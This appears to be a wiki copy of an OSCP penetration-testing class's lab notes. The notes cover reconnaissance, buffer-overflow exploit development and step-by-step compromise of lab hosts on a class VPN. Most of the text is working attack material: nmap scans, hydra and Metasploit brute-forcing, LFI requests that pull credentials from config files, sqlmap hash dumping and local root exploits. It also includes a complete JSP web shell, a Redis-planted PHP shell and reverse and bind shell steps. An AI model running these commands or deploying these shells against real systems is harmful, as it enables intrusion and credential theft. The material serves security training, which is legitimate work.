seguridad:enlaces:certificaciones:oscp:oscp_prep_class
OSCP Prep class
https://pastebin.com/raw/s59GPJrr
Day 1: Exploit Research
http://www.securitytube.net/groups?operation=view&groupId=7
Day 2: Python Hacking
https://www.youtube.com/playlist?list=PLEA1FEF17E1E5C0DA (videos 1-10 if you are a complete beginner)
https://www.youtube.com/playlist?list=PL1A2CSdiySGLtKwqBnqj9BON6QQjWkP4n (entire playlist)
#################################
----------- ############### # Day 1: Advanced Scanning Labs # ############### -----------
#################################
---------------------------Type This-----------------------------------
cd /home/strategicsec/toolz
wget https://dl.packetstormsecurity.net/UNIX/scanners/blindcrawl.pl
perl blindcrawl.pl -d motorola.com
-----------------------------------------------------------------------
-- Take each IP address and look ip up here:
http://www.networksolutions.com/whois/index.jsp
Zone Transfer fails on most domains, but here is an example of one that works:
---------------------------Type This-----------------------------------
dig axfr heartinternet.co.uk @ns.heartinternet.co.uk
cd ~/toolz/
wget --no-check-certificate https://raw.githubusercontent.com/BenDrysdale/ipcrawl/master/ipcrawl.c
gcc ipcrawl.c -o ipcrawl
chmod 777 ipcrawl
./ipcrawl 148.87.1.1 148.87.1.254
sudo nmap -sL 148.87.1.0-255
strategicsec
sudo nmap -sL 148.87.1.0-255 | grep oracle
strategicsec
-----------------------------------------------------------------------
########################
# Scanning Methodology #
########################
- Ping Sweep
What's alive?
------------
sudo nmap -sP 157.166.226.*
strategicsec
-if -SP yields no results try:
sudo nmap -sL 157.166.226.*
strategicsec
-Look for hostnames:
sudo nmap -sL 157.166.226.* | grep com
strategicsec
- Port Scan
What's where?
------------
sudo nmap -sS 162.243.126.247
strategicsec
- Bannergrab/Version Query
What versions of software are running
-------------------------------------
sudo nmap -sV 162.243.126.247
strategicsec
- Vulnerability Research
Lookup the banner versions for public exploits
----------------------------------------------
http://exploit-db.com
http://securityfocus.com/bid
https://packetstormsecurity.com/files/tags/exploit/
##############################
# Scanning Process to follow #
##############################
Step 1: Ping Sweep
------------------
nmap -sP <IP-ADDRESS-RANGE>
nmap -sL <IP-ADDRESS-RANGE>
Step 2: Port Scan
-----------------
nmap -sS <IP-ADDRESS>
Step 3: Bannergrab
------------------
nmap -sV <IP-ADDRESS>
nmap -sV -p- <IP-ADDRESS>
|
----> Vulnerability Research
Step 4: Vulnerability Scan the webservers
-----------------------------------------
git clone https://github.com/sullo/nikto.git Nikto2
cd Nikto2/program
perl nikto.pl -h <IP-ADDRESS>
Step 5: Directory Bruteforce
--------------------
git clone https://github.com/v0re/dirb.git
cd dirb/
./configure
make
./dirb
./dirb http://<IP-ADDRESS> wordlists/big.txt
Step 6: Bruteforce any services you find
----------------------------------------
root@kali:~# hydra -L username.txt -P passlist.txt ftp://<IP-ADDRESS
root@kali:~# hydra -l user -P passlist.txt ftp://<IP-ADDRESS
##############################
----------- ############### # Day 2: Stack Overflow Labs # ############### -----------
##############################
#######################################
# Download the class virtual machines #
#######################################
You can download the Exploit Dev VMs from the links below:
https://s3.amazonaws.com/infosecaddictsvirtualmachines/XPSP3-ED-Target.zip
user: Administrator
pass: strategicsec
https://s3.amazonaws.com/infosecaddictsvirtualmachines/Strategicsec-XP-ED-Attack-Host.zip
user: Administrator
pass: strategicsec
https://s3.amazonaws.com/infosecaddictsvirtualmachines/Win7x64.zip
username: workshop
password: password
Inside of your XP-ED-AttackHost VM please download this file and extract it to your Desktop:
https://s3.amazonaws.com/StrategicSec-Files/ED-Workshop-Files.zip
#########################################
# Download this file on your windows VM #
#########################################
https://s3.amazonaws.com/infosecaddictsfiles/ExploitLab.zip
https://s3.amazonaws.com/infosecaddictsfiles/SLmail5-5-Exploit.zip
#####################################
# Quick Stack Based Buffer Overflow #
#####################################
- You can download everything you need for this exercise (except netcat) from the link below
https://s3.amazonaws.com/infosecaddictsfiles/ExploitLab.zip
- Extract this zip file to your Desktop
- Go to folder C:\Users\Workshop\Desktop\ExploitLab\2-VulnServer, and run vulnserv.exe
- Open a new command prompt and type:
nc localhost 9999
- In the new command prompt window where you ran nc type:
HELP
- Go to folder C:\Users\Workshop\Desktop\ExploitLab\4-AttackScripts
- Right-click on 1-simplefuzzer.py and choose the option edit with notepad++
- Now double-click on 1-simplefuzzer.py
- You'll notice that vulnserv.exe crashes. Be sure to note what command and the number of As it crashed on.
- Restart vulnserv, and run 1-simplefuzzer.py again. Be sure to note what command and the number of As it crashed on.
- Now go to folder C:\Users\Workshop\Desktop\ExploitLab\3-OllyDBG and start OllyDBG. Choose 'File' -> 'Attach' and attach to process vulnserv.exe
- Go back to folder C:\Users\Workshop\Desktop\ExploitLab\4-AttackScripts and double-click on 1-simplefuzzer.py.
- Take note of the registers (EAX, ESP, EBP, EIP) that have been overwritten with As (41s).
- Now isolate the crash by restarting your debugger and running script 2-3000chars.py
- Calculate the distance to EIP by running script 3-3000chars.py
- This script sends 3000 nonrepeating chars to vulserv.exe and populates EIP with the value: 396F4338
4-count-chars-to-EIP.py
- In the previous script we see that EIP is overwritten with 396F4338 is 8 (38), C (43), o (6F), 9 (39)
- so we search for 8Co9 in the string of nonrepeating chars and count the distance to it
5-2006char-eip-check.py
- In this script we check to see if our math is correct in our calculation of the distance to EIP by overwriting EIP with 42424242
6-jmp-esp.py
- In this script we overwrite EIP with a JMP ESP (6250AF11) inside of essfunc.dll
7-first-exploit
- In this script we actually do the stack overflow and launch a bind shell on port 4444
8 - Take a look at the file vulnserv.rb and place it in your Ubuntu host via SCP or copy it and paste the code into the host.
------------------------------
cd /home/strategicsec/toolz/metasploit/modules/exploits/windows/misc
vi vulnserv.rb (paste the code into this file)
cd ~/toolz/metasploit
./msfconsole
use exploit/windows/misc/vulnserv
set PAYLOAD windows/meterpreter/bind_tcp
set RHOST 192.168.88.129
set RPORT 9999
exploit
---------------------------------------------------------------------
Day 1 Challenge:
Write an exploit for FreeFloat FTP - make sure that it is broken up into multiple scripts like the vulnserver exploit is.
https://www.exploit-db.com/apps/687ef6f72dcbbf5b2506e80a375377fa-freefloatftpserver.zip
Reference scripts for FreeFloat FTP:
https://www.exploit-db.com/exploits/40711/
https://www.exploit-db.com/exploits/40681/
https://www.exploit-db.com/exploits/40677/
https://www.exploit-db.com/exploits/40674/
https://www.exploit-db.com/exploits/40673/
https://www.exploit-db.com/exploits/40672/
https://www.exploit-db.com/exploits/24479/
##################
# Linux Exploits #
##################
The target virtual machine for these labs can be downloaded from here:
https://s3.amazonaws.com/infosecaddictsvirtualmachines/asterisk.zip
root: exploitlab
user: exploitlab
pass: exploitlab
The attack scripts can be downloaded from here:
https://s3.amazonaws.com/secureninja/files/peercast_skel.zip
https://s3.amazonaws.com/secureninja/files/dproxy.zip
https://s3.amazonaws.com/secureninja/files/asterisk.zip
######################################
# Lab 1: Simple Linux Stack Overflow #
######################################
Login to the asterisk VM with the username/password of (exploitlab/exploitlab)
---------------------------Type This-----------------------------------
cat victim1.c
gcc victim1.c -o victim1
./victim AAAAAAAAAAAAAAAAAAA
./victim AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
gdb -core core.xxxx
info registers
x/64x $esp
quit
/usr/local/sbin/peercast
-open peercast1.py on the XP attack-
python peercast1.py | nc asterisk-vm-ip 7144
gdb -core core.xxxx
info registers
x/64x $esp
quit
/usr/local/sbin/peercast
-open peercast2.py-
python peercast2.py | nc asterisk-vm-ip 7144
gdb -core core.xxxx
info registers
x/64x $esp
quit
- SSH into the Ubuntu Host (strategicsec:strategicsec) -
cd /home/strategicsec/toolz/metasploit/tools/exploit
Now we will run the pattern offset with ruby:
ruby pattern_offset.rb 42306142
and
ruby pattern_offset.rb 61423161
-----------------------------------------------------------------------
Distance to EIP is 780
Relative position of ESP 784
Now to find a good JMP ESP address with msfelfscan
---------------------------Type This-----------------------------------
cd /home/strategicsec/toolz/metasploit/
./msfelfscan -j ESP binaries/peercast_binary
-----------------------------------------------------------------------
0x0808fb57 jmp esp <----- we will use this one!
0x0808fcc7 jmp esp
0x0808ffff jmp esp
0x08090057 jmp esp <----- we can't use this one.
0x080901df jmp esp
Now open and edit peercast3.py in notepad++ on our XP Host machine.
pad_lenth = the distance to EIP
ret_address = the jmp esp we are using
---------------------------Type This-----------------------------------
python peercast3.py | nc asterisk-vm-ip 7144
gdb -core core.xxxx
info registers
x/64x $eip
x/10i $eip
quit
-----------------------------------------------------------------------
Open peercast4.py in Notepad++ and replace the \xCC with our msf shellcode
Linux IA32 Reverse Shell
LHOST (Listening Host) – the IP of your XP host machine ipconfig /all
LPORT (Listening Port) – chose a port to run your listener on
Encoder: Alpha2
---------------------------Type This-----------------------------------
nc -l -p 4321
python peercast4.py | nc asterisk-vm-ip 7144
-----------------------------------------------------------------------
###########################
----------- ############### # Day 3: Attack Lab Hosts # ############### -----------
###########################
#########################
# Class Virtual Machine #
#########################
Here is the VMWare virtual machine for the class or you can use Kali Linux as well if you like:
https://s3.amazonaws.com/infosecaddictsvirtualmachines/Ubuntu-17-10-InfoSecAddictsVM.zip
user: infosecaddicts
pass: infosecaddicts
Let's have you connect to the VPN. I wanted to make sure that I did some of the stuff on my local virtual machines because I want you to do the hunting for vulnerable hosts to attack.
To connect to the VPN open a web browser on your host machine (not your virtual machine) and go to the following URL:
https://54.245.178.32/?src=connect
Accept the security exception and enter one of the following user names:
username: labuser001
username: labuser002
username: labuser003
username: labuser004
username: labuser005
username: labuser006
username: labuser007
username: labuser008
username: labuser009
username: labuser010
username: labuser011
username: labuser012
username: labuser013
username: labuser014
username: labuser015
username: labuser016
username: labuser017
username: labuser018
username: labuser019
username: labuser020
----------------------------------------------------------------------------------------------------------------------------------------
Mr. McCray will provide you with the password for the usernames above once the training session starts.
The target network range is:
172.31.2.0/24
You can do any attack EXCEPT man-in-the-middle attacks, and please DO NOT attack any other IP ranges.
----------------------------------------------------------------------------------------------------------------------------------------
Some tools to install:
---------------------------Type This-----------------------------------
wget --no-check-certificate https://dl.packetstormsecurity.net/UNIX/scanners/propecia.c
gcc propecia.c -o propecia
sudo cp propecia /bin
-----------------------------------------------------------------------
Step 1: Portscan the server
---------------------------Type This-----------------------------------
sudo nmap -sS 172.31.2.139
-----------------------------------------------------------------------
Step 2: Version scan the server
---------------------------Type This-----------------------------------
sudo nmap -sV -p22,80 172.31.2.139
-----------------------------------------------------------------------
Step 3: Vulnerability scan the webserver
---------------------------Type This-----------------------------------
cd ~/toolz/
rm -rf nikto*
git clone https://github.com/sullo/nikto.git Nikto2
cd Nikto2/program
perl nikto.pl -h 172.31.2.139
-----------------------------------------------------------------------
Step 4: Directory brute-force the webserver
---------------------------Type This-----------------------------------
cd ~/toolz
git clone https://github.com/v0re/dirb.git
cd dirb/
./configure
make
dirb
./dirb http://172.31.2.139 wordlists/big.txt
-----------------------------------------------------------------------
----------------------------------------------------------------------------------------------------------------------------------------------
Attack steps:
-------------
Step 1: Ping sweep the target network
-------------------------------------
---------------------------Type This-----------------------------------
nmap -sP 172.31.2.0/24
-----------------------------------------------------------------------
Found 4 hosts:
172.31.2.47
172.31.2.47
172.31.2.157
172.31.2.217
Step 2: Port scan target system
-------------------------------
---------------------------Type This-----------------------------------
sudo nmap -sV 172.31.2.47
-----------------------------------------------------------------------
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.4 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.2.22 ((Ubuntu))
514/tcp filtered shell
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Step 3: Vulnerability Scan the webserver
----------------------------------------
---------------------------Type This-----------------------------------
cd ~/toolz/
rm -rf nikto*
git clone https://github.com/sullo/nikto.git Nikto2
cd Nikto2/program
perl nikto.pl -h 172.31.2.47
-----------------------------------------------------------------------
Step 4: Run dirbuster or similar directory bruteforce tool against the target
-----------------------------------------------------------------------------
---------------------------Type This-----------------------------------
wget https://dl.packetstormsecurity.net/UNIX/cgi-scanners/Webr00t.pl
perl Webr00t.pl -h 172.31.2.47 -v | grep -v "404 Not Found"
-----------------------------------------------------------------------
Step 5: Browse the web site to look for clues
---------------------------------------------
Since no glaring vulnerabilities were found with the scanner - we start just looking around the website itself
http://172.31.2.47/test
http://172.31.2.47/test.php (got the following error message)
'file' parameter is empty. Please provide file path in 'file' parameter
Figured this was a Local File Include (LFI) so I tried:
http://172.31.2.47/test.php?file=/etc/passwd
http://172.31.2.47/test.php?file=/etc/passwd%00
None of these worked so I tried it as a POST request with curl (reference: https://pastebin.com/yfBz5H7b)
---------------------------Type This-----------------------------------
curl -X POST -F 'file=/etc/passwd' http://172.31.2.47/test.php
-----------------------------------------------------------------------
http://172.31.2.47/a
http://172.31.2.47/b
http://172.31.2.47/c (a and b gave 404 errors, but "c" is a blank page, and view source is blank as well - this must be a config file"
So let's try that POST request with curl to pull down the c.php config file.
---------------------------Type This-----------------------------------
curl -X POST -F 'file=/var/www/html/c.php' http://172.31.2.47/test.php
curl -X POST -F 'file=/var/htdocs/c.php' http://172.31.2.47/test.php
curl -X POST -F 'file=/var/www/c.php' http://172.31.2.47/test.php
-----------------------------------------------------------------------
<?php
#header( 'Z-Powered-By:its chutiyapa xD' );
header('X-Frame-Options: SAMEORIGIN');
header( 'Server:testing only' );
header( 'X-Powered-By:testing only' );
ini_set( 'session.cookie_httponly', 1 );
$conn = mysqli_connect("127.0.0.1","billu","b0x_billu","ica_lab");
// Check connection
if (mysqli_connect_errno())
{
echo "connection failed -> " . mysqli_connect_error();
}
?>
---------------------------Type This-----------------------------------
ssh -l billu 172.31.2.47
b0x_billu
-----------------------------------------------------------------------
http://172.31.2.47/phpmyadmin
http://172.31.2.47/phpMyAdmin
http://172.31.2.47/pma
http://172.31.2.47/phpmy
Then I Googled config file name for phpmyadmin (config.inc.php)
---------------------------Type This-----------------------------------
curl -X POST -F 'file=/var/www/phpmy/config.inc.php' http://172.31.2.47/test.php
-----------------------------------------------------------------------
<?php
/* Servers configuration */
$i = 0;
/* Server: localhost [1] */
$i++;
$cfg['Servers'][$i]['verbose'] = 'localhost';
$cfg['Servers'][$i]['host'] = 'localhost';
$cfg['Servers'][$i]['port'] = '';
$cfg['Servers'][$i]['socket'] = '';
$cfg['Servers'][$i]['connect_type'] = 'tcp';
$cfg['Servers'][$i]['extension'] = 'mysqli';
$cfg['Servers'][$i]['auth_type'] = 'cookie';
$cfg['Servers'][$i]['user'] = 'root';
$cfg['Servers'][$i]['password'] = 'roottoor';
$cfg['Servers'][$i]['AllowNoPassword'] = true;
---------------------------Type This-----------------------------------
ssh -l root 172.31.2.47
roottoor
-----------------------------------------------------------------------
---------------------------------------------------------------------------------------------------------------------------------------------------------
Attack steps:
-------------
Step 1: Ping sweep the target network
-------------------------------------
---------------------------Type This-----------------------------------
nmap -sP 172.31.2.0/24
-----------------------------------------------------------------------
- Found 3 hosts
172.31.2.64
172.31.2.217
172.31.2.238
Step 2: Port scan target system
-------------------------------
---------------------------Type This-----------------------------------
nmap -sV 172.31.2.64
-----------------------------------------------------------------------
-------------Scan Results--------------------------------------------
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.6 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
514/tcp filtered shell
1037/tcp filtered ams
6667/tcp open irc ngircd
Service Info: Host: irc.example.net; OS: Linux; CPE: cpe:/o:linux:linux_kernel
--------------------------------------------------------------------
Step 3: Vulnerability Scan the webserver
----------------------------------------
---------------------------Type This-----------------------------------
cd ~/toolz/
rm -rf nikto*
git clone https://github.com/sullo/nikto.git Nikto2
cd Nikto2/program
perl nikto.pl -h 172.31.2.64
-----------------------------------------------------------------------
Step 4: Run dirbuster or similar directory bruteforce tool against the target
-----------------------------------------------------------------------------
---------------------------Type This-----------------------------------
wget https://dl.packetstormsecurity.net/UNIX/cgi-scanners/Webr00t.pl
perl Webr00t.pl -h 172.31.2.64 -v
-----------------------------------------------------------------------
Step 5: Browse the web site to look for clues
---------------------------------------------
Since no glaring vulnerabilities were found with the scanner - we start just looking around the website itself
..... really didn't get much from here so we just opened the web page in a browser
http://172.31.2.64/
.....browsed to the webpage and saw that it pointed to:
http://172.31.2.64/jabc
....clicked on documentation link and found hidden text that pointed to here:
http://172.31.2.64/jabcd0cs/
....saw that the app was OpenDocMan v1.2.7 and found it was vulnerable:
https://www.exploit-db.com/exploits/32075/
Tried the sql injection described in exploit-db:
http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user UNION SELECT 1,version(),3,4,5,6,7,8,9
http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user UNION SELECT 1,user(),3,4,5,6,7,8,9
Tried to run sqlmap against the target
---------------------------Type This-----------------------------------
cd sqlmap-dev/
python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -b --dbms=mysql
python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" --current-user --dbms=mysql
python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" --current-db --dbms=mysql
python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" --dbs --dbms=mysql
python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" --users --passwords --dbms=mysql
-----------------------------------------------------------------------
FOUND: cracked password 'toor' for user 'drupal7' (sqlmap)
FOUND: 9CFBBC772F3F6C106020035386DA5BBBF1249A11 hash is 'toor' verified at crackstation.net
---------------------------Type This-----------------------------------
python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -D jabcd0cs --tables --dbms=mysql
python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -D jabcd0cs -T odm_user --dump --dbms=mysql
-----------------------------------------------------------------------
username: webmin
hash: b78aae356709f8c31118ea613980954b
https://hashkiller.co.uk/md5-decrypter.aspx
hash: b78aae356709f8c31118ea613980954b
pass: webmin1980
ok - /phpmyadmin and /webmin both did not work in the browser but these credentials worked for SSH.
---------------------------Type This-----------------------------------
ssh -l webmin 172.31.2.64
webmin1980
id
cat /etc/*release
-----------------------------------------------------------------------
....tired of not having a real command shell...
---------------------------Type This-----------------------------------
python -c 'import pty;pty.spawn("/bin/bash")'
cd /tmp
pwd
cat >> exploit.c << out
**************paste in the content from here *****************
https://www.exploit-db.com/raw/39166/
------ hit enter a few times ------
------ then type 'out' ----- this closes the file handle...
---------------------------Type This-----------------------------------
gcc -o boom exploit.c
./boom
-----------------------------------------------------------------------
------------exploit failed, damn let's try another one ---------
---------------------------Type This-----------------------------------
cat >> exploit2.c << out
**************paste in the content from here *****************
https://www.exploit-db.com/raw/37292/
out
gcc -o boom2 exploit2.c
./boom2
id
......YEAH - do the happy dance!!!!
---- Previous class attack process -------
#########################
# Building a quick list #
#########################
---------------------------Type This-----------------------------------
cd ~
echo bob >> list.txt
echo jim >> list.txt
echo joe >> list.txt
echo tim >> list.txt
echo admin >> list.txt
echo hello >> list.txt
echo rob >> list.txt
echo test >> list.txt
echo aaaaaa >> list.txt
echo larry >> list.txt
echo mario >> list.txt
echo jason >> list.txt
echo john >> list.txt
-----------------------------------------------------------------------
###########################################################
# Let's start with some basic scanning of the lab network #
###########################################################
---------------------------Type This-----------------------------------
infosecaddicts@ubuntu:~$ nmap -sP 172.31.2.0/24
-----------------------------------------------------------------------
Starting Nmap 7.12 ( https://nmap.org ) at 2017-11-21 13:17 EST
Nmap scan report for 172.31.2.24
Host is up (0.046s latency).
Nmap scan report for 172.31.2.47
Host is up (0.045s latency).
Nmap scan report for 172.31.2.64
Host is up (0.037s latency).
Nmap scan report for 172.31.2.86
Host is up (0.040s latency).
Nmap scan report for 172.31.2.117
Host is up (0.038s latency).
Nmap scan report for 172.31.2.139
Host is up (0.037s latency).
Nmap scan report for 172.31.2.157
Host is up (0.036s latency).
Nmap scan report for 172.31.2.217
Host is up (0.047s latency).
Nmap scan report for 172.31.2.238
Host is up (0.036s latency).
Nmap done: 256 IP addresses (9 hosts up) scanned in 3.22 seconds
---------------------------Type This-----------------------------------
infosecaddicts@ubuntu:~$ sudo nmap -sS 172.31.2.24
-----------------------------------------------------------------------
[sudo] password for infosecaddicts:
Starting Nmap 7.12 ( https://nmap.org ) at 2017-11-21 13:18 EST
Nmap scan report for 172.31.2.24
Host is up (1.8s latency).
Not shown: 989 closed ports
PORT STATE SERVICE
25/tcp open smtp
80/tcp open http
111/tcp open rpcbind
139/tcp open netbios-ssn
445/tcp open microsoft-ds
514/tcp filtered shell
1322/tcp open novation
2049/tcp open nfs
8080/tcp open http-proxy
8081/tcp open blackice-icecap
9000/tcp open cslistener
Nmap done: 1 IP address (1 host up) scanned in 133.56 seconds
---------------------------Type This-----------------------------------
infosecaddicts@ubuntu:~$ sudo nmap -sV -p25,80,111,139,445,1322,2049,8080,8081,9000 172.31.2.24
-----------------------------------------------------------------------
Starting Nmap 7.12 ( https://nmap.org ) at 2017-11-21 13:21 EST
Nmap scan report for 172.31.2.24
Host is up (0.031s latency).
PORT STATE SERVICE VERSION
25/tcp open ftp vsftpd 3.0.2
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
111/tcp open rpcbind 2-4 (RPC #100000)
139/tcp open netbios-ssn Samba smbd 3.X (workgroup: CANYOUPWNME)
445/tcp open netbios-ssn Samba smbd 3.X (workgroup: CANYOUPWNME)
1322/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
2049/tcp open nfs_acl 2-3 (RPC #100227)
8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
8081/tcp open http Apache httpd 2.4.7 ((Ubuntu))
9000/tcp open http Jetty winstone-2.9
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.15 seconds
###########################
# Day 1: Attacking Kevgir #
###########################
******** Attacking Kevgir ********
I figured I've give you something fun to play with.
###############
# Using Nikto #
###############
---------------------------Type This-----------------------------------
cd ~/toolz/
rm -rf nikto*
git clone https://github.com/sullo/nikto.git Nikto2
cd Nikto2/program
perl nikto.pl -h 172.31.2.24
perl nikto.pl -h 172.31.2.24:8080
perl nikto.pl -h 172.31.2.24:8081
perl nikto.pl -h 172.31.2.24:9000
-----------------------------------------------------------------------
####################
# Using Metasploit #
####################
---------------------------Type This-----------------------------------
cd ~/toolz/metasploit
./msfconsole
use auxiliary/scanner/http/http_version
set RHOSTS 172.31.2.24
set RPORT 8080
run
-------------------------------
use auxiliary/scanner/http/tomcat_enum
set RHOSTS 172.31.2.24
set RPORT 8080
run
-----------------------------------------------------------------------
####################
# Attacking Tomcat #
####################
---------------------------Type This-----------------------------------
use auxiliary/scanner/http/http_version
set RHOSTS 172.31.2.24
set RPORT 8080
run
-------------------------------
use auxiliary/scanner/http/tomcat_mgr_login
set USERNAME tomcat
set USERPASS_FILE /home/infosecaddicts/list.txt
set STOP_ON_SUCCESS true
set RHOSTS 172.31.2.24
set RPORT 8080
run
-------------------------------
use exploit/multi/http/tomcat_mgr_upload
set HttpUsername tomcat
set HttpPassword tomcat
set RHOST 172.31.2.24
set RPORT 8080
set PATH /manager/html
set PAYLOAD java/meterpreter/bind_tcp
exploit
run post/linux/gather/checkvm
run post/linux/gather/enum_configs
run post/linux/gather/enum_protections
run post/linux/gather/enum_system
run post/linux/gather/enum_users_history
run post/linux/gather/hashdump
shell
/bin/bash
id
uname -a
dpkg -l
cd /tmp
pwd
cat >> exploit.c << out
**************paste in the content from here *****************
https://raw.githubusercontent.com/offensive-security/exploit-database/master/platforms/linux/local/39166.c
------ hit enter a few times ------
------ then type 'out' ----- this closes the file handle...
gcc -o boom exploit.c
./boom
id
-----------------------------------------------------------------------
---------------------------Type This-----------------------------------
hydra -l tomcat -P /home/infosecaddicts/list.txt -e ns -s 8080 -vV 172.31.2.24 http-get /manager/html
-----------------------------------------------------------------------
-------------------------------------------index.jsp-------------------------------------------
<FORM METHOD=GET ACTION='index.jsp'>
<INPUT name='cmd' type=text>
<INPUT type=submit value='Run'>
</FORM>
<%@ page import="java.io.*" %>
<%
String cmd = request.getParameter("cmd");
String output = "";
if(cmd != null) {
String s = null;
try {
Process p = Runtime.getRuntime().exec(cmd,null,null);
BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream()));
while((s = sI.readLine()) != null) { output += s+"</br>"; }
} catch(IOException e) { e.printStackTrace(); }
}
%>
<pre><%=output %></pre>
-------------------------------------------index.jsp-------------------------------------------
***** now pack the webshell *****
---------------------------Type This-----------------------------------
mkdir webshell
cp index.jsp webshell
cd webshell
jar -cvf ../webshell.war *
-----------------------------------------------------------------------
Deploy the WAR file using the built-in deploy option on the manager web-page.
Once the WAR file is deployed I simply browse to the URL I deployed the WAR file
now upload the webshell.war. After uploading, visit page: http://172.31.2.2:8080/webshell/
****** This section isn't finished ******
---------------------------Type This-----------------------------------
cd ~/toolz/metasploit
./msfvenom -p linux/x86/shell_bind_tcp LPORT="7777" -f war > /home/infosecaddicts/bind7777.war
jar tf ~/bind7777.war
-----------------------------------------------------------------------
****** This section isn't finished ******
Google is your friend hahahahahahahah........
#################
# Attacking FTP #
#################
---------------------------Type This-----------------------------------
sudo nmap -sV -Pn -p25 --script=banner,ftp-anon,ftp-bounce,ftp-proftpd-backdoor,ftp-vsftpd-backdoor 172.31.2.24
cd ~/toolz/hydra
hydra -l admin -P /home/infosecaddicts/list.txt -u -s 25 172.31.2.24 ftp
ftp
open 172.31.2.24
admin
admin
pwd
ls -lah
ls ../../
-----------------------------------------------------------------------
#################
# Attacking SSH #
#################
---------------------------Type This-----------------------------------
sudo apt-get install -y libssh-dev
infosecaddicts
cd ~/toolz/hydra
make clean
./configure
make
sudo make install
hydra -L /home/infosecaddicts/list.txt -P /home/infosecaddicts/list.txt -u -s 1322 172.31.2.24 ssh
ssh -p 1322 admin@172.31.2.24
-------------------------------
cd ~/toolz/metasploit
./msfconsole
use auxiliary/scanner/ssh/ssh_enumusers
set USER_FILE /home/infosecaddicts/list.txt
set STOP_ON_SUCCESS true
set RHOSTS 172.31.2.24
set RPORT 1322
run
use auxiliary/scanner/ssh/ssh_login
set USER_FILE /home/infosecaddicts/list.txt
set PASS_FILE /home/infosecaddicts/list.txt
set STOP_ON_SUCCESS true
set RHOSTS 172.31.2.24
set RPORT 1322
run
sessions -l
sessions -u 1
sessions -i 1
id
-----------------------------------------------------------------------
########################
# Attacking phpMyAdmin #
########################
****** This section isn't finished ******
---------------------------Type This-----------------------------------
hydra -l root -P /home/infosecaddicts/list.txt -e n http-post-form://172.31.2.24 -m "/phpMyAdmin/index.php:pma_username=^USER^&pma_password=^PASS^&server=1:S=information_schema"
-----------------------------------------------------------------------
****** This section isn't finished ******
Google is your friend hahahahahahahah........
---------------------------Type This-----------------------------------
wget https://repo.palkeo.com/repositories/mysterie.fr/prog/darkc0de/others/pmabf.py
python pmabf.py http://172.31.2.24 root list.txt (this gave me the WRONG password)
-----------------------------------------------------------------------
####################
# Attacking Joomla #
####################
---------------------------Type This-----------------------------------
cd ~/toolz/metasploit
./msfconsole
use use auxiliary/scanner/http/joomla_plugins
set RHOSTS 172.31.2.24
set RPORT 8080
run
-----------------------------------------------------------------------
****** This section isn't finished ******
Google is your friend hahahahahahahah........
#####################
# Attacking Jenkins #
#####################
****** This section isn't finished ******
Google is your friend hahahahahahahah........
#################
# Attacking NFS #
#################
---------------------------Type This-----------------------------------
sudo apt install -y rpcbind nfs-common
rpcinfo -s 172.31.2.24
showmount -e 172.31.2.24
sudo /bin/bash
mkdir /tmp/nfs
mount -t nfs 172.31.2.24:/backup /tmp/nfs -o nolock
ls /tmp/nfs
cp /tmp/nfs/backup.tar.bz2.zip /home/infosecaddicts
umount -l /tmp/nfs
exit
sudo apt-cache search fcrackzip
sudo apt-get install -y fcrackzip
fcrackzip -u backup.tar.bz2.zip
unzip -P aaaaaa backup.tar.bz2.zip
tar jxf backup.tar.bz2
-----------------------------------------------------------------------
###################
# Attacking Redis #
###################
---------------------------Type This-----------------------------------
sudo nmap -p 6379 --script=redis-info 172.31.2.24
infosecaddicts
sudo apt-get install -y redis-tools
infosecaddicts
redis-cli -h 172.31.2.24
CONFIG SET dir /var/www/html/main
CONFIG GET dir
config set dbfilename boom.php
CONFIG GET dbfilename
SET cmd "<?php system($_GET['joe']); ?>"
BGSAVE
http://172.31.2.24/boom.php
http://172.31.2.24/boom.php?joe=id
(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > foo.txt/.ssh"
****** This section isn't finished ******
Google is your friend hahahahahahahah........
cd ~/toolz/metasploit
./msfconsole
use auxiliary/scanner/redis/file_upload
set RHOSTS 172.31.2.24
set LocalFile
****** This section isn't finished ******
Google is your friend hahahahahahahah........
sudo nmap -sV -p 3260 172.31.2.217
sudo apt install open-iscsi
sudo iscsiadm -m discovery -t st -p 172.31.2.217
sudo iscsiadm -m discovery -t st -p 172.31.2.217:3260
sudo iscsiadm -m node -p 172.31.2.217 --login
sudo /bin/bash
fdisk -l
***** look for /dev/sda5 - Linux swap / Solaris *******
mkdir /mnt/217vm
mount /dev/sdb /mnt/217vm
cd /mnt/217vm
ls
cat flag1.txt
file bobsdisk.dsk
mkdir /media/bobsdisk
